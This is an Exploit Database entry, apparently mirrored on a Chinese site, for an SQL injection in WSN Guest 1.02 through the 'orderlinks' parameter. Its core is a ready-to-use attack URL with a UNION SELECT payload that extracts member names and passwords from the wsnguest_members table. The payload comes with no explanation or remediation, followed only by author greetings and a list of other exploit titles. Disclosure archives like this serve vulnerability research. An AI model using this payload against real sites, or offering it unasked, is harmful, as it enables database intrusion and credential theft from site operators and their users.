WSN Guest 1.02 – ‘orderlinks’ SQL Injection

Exploit Database
95 阅读

作者： Gamoscu

日期： 2010-02-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11436/

###########################
Author: Gamoscu
Homepage: http://www.1923turk.com
Blog: http://gamoscu.wordpress.com/
Script: WSN Guest 1.02
Download: http://scripts.webmastersite.net/wsnguest/wsnguest.zip
###########################

Exploat:index.php?page=20&orderlinks=SQL
 



http://server/wsnguest/index.php?page=20&orderlinks=+and+1=0+union+select+name,null,null,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wsnguest_members--



############################################################## 
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO 
##############################################################

Veda Turlarý :)

last Exploits
WSN Guest 1.02 – ‘orderlinks’ SQL Injection的更多信息

Basic Analysis and Security Engine (BASE) 1.4.5 – ‘base_ag_main.php?base_path’ Remote File Inclusion：
CiviCRM 5.59.alpha1 – Stored XSS (Cross-Site Scripting)：
XOOPS – ‘view_photos.php’ Cross-Site Scripting：
ManageEngine Service Desk 10.0 – Cross-Site Scripting：
Sophos VPN Web Panel 2020 – Denial of Service (Poc)：
RATES SYSTEM 1.0 – Authentication Bypass：
WordPress Plugin WP Private Messages 1.0.1 – SQL Injection (2)：
JW Player – ‘logo.link’ Cross-Site Scripting：